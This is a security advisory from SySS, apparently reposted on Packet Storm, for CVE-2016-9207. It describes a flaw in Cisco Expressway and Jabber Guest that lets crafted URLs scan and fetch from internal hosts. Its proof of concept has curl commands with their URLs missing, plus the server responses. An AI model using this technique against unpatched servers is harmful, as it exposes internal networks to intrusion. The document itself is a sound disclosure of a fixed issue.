Cisco Expressway 8.8.1 Internal Scanning

Type packetstorm
Reporter Micha Borrmann
Modified 2016-12-17T00:00:00


                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
Advisory ID: SYSS-2016-115  
Product: Expressway  
Manufacturer: Cisco  
Affected Version(s): below X8.9  
Tested Version(s): X8.8.1  
Vulnerability Type: Improper Input Validation (CWE-20)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2016-11-10  
Solution Date: 2016-12-05  
Public Disclosure: 2016-12-14  
CVE Reference: CVE-2016-9207  
Author of Advisory: Micha Borrmann, SySS GmbH  
Jabber Guest [1] can be used to connect people from the Internet with  
enterprise workers using video calls within a web browser.  
Due to improper input validation, it is possible by using specially  
crafted URLs to perform port scans from the used video communication  
server (VCS) [2] of any system which can be reached by it, usually  
internal servers. It is also possible to perform denial-of-service  
attacks against the VCS by downloading large files.  
Vulnerability Details:  
A part of the URL is a host name (usually the internal Jabber Guest  
server) which will be connected from the EXP-C [3] which acts like a  
web proxy, if /jabberc/rest/calls/ is appended to the first "directory".  
With a colon (:), it is also possible to specify a target TCP port.  
Therefore, anybody, for example an external attacker, can abuse the web-based   
application to connect to target systems. If the system is a web  
server, it also possible to download files from it.   
Proof of Concept (PoC):  
This HTTP GET requests connects to the SSH server on localhost:  
$ curl --include  
HTTP/1.1 200 Connection Established  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:14:20 GMT  
Transfer-Encoding: chunked  
Connection: keep-alive  
Age: 0  
SSH-2.0-OpenSSH_6.6 PKIX  
Protocol mismatch.  
It can be confirmed, that no SMTP service is running on localhost (very simple port scan):  
$ curl --include  
HTTP/1.1 502 Connection refused  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:22:30 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 253  
Connection: keep-alive  
Cache-Control: no-store  
Content-Language: en  
Age: 0  
<TITLE>Could Not Connect</TITLE>  
<BODY BGCOLOR="white" FGCOLOR="black">  
<H1>Could Not Connect</H1>  
<FONT FACE="Helvetica,Arial"><B>  
Description: Could not connect to the server "<EM></EM>".  
Connections to other servers are possible, too:  
$ curl --include  
HTTP/1.1 200 Connection Established  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:13:00 GMT  
Transfer-Encoding: chunked  
Connection: keep-alive  
Age: 0  
SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515  
Protocol mismatch.  
If a web server contains files within the directory structure  
/jabberc/rest/calls/, they can be downloaded via the Jabber Guest via  
EXP-E via EXP-C. For demonstration purposes, there was a simple text  
file placed at such directory (on a Microsoft Server system which can  
also be identified):  
$ curl --include   
HTTP/1.1 200 OK  
Content-Type: text/plain  
Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT  
Accept-Ranges: bytes  
ETag: "78c1c7984c30d21:0"  
Server: Microsoft-IIS/7.5  
X-Powered-By: ASP.NET  
Date: Thu, 10 Nov 2016 09:28:15 GMT  
Content-Length: 7  
Age: 0  
Connection: keep-alive  
Update to software version 8.9  
More Information:  
Disclosure Timeline:  
2016-10-27: Vulnerability discovered  
2016-11-10: Vulnerability reported to manufacturer  
2016-12-05: Patch released by manufacturer  
2016-12-07: Public disclosure of vulnerability by manufacturer [4]  
[1] Product website for Jabber Guest  
[2] Product website for Video Communication Server (VCS)  
[3] Product website for Expressway  
[4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability  
[5] SySS Security Advisory SYSS-2016-115  
[6] SySS Responsible Disclosure Policy  
This security vulnerability was found by Micha Borrmann of SySS GmbH.  
Public Key:  
Key ID: 0xEDBE26E714EA58760  
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
Creative Commons - Attribution (by) - Version 3.0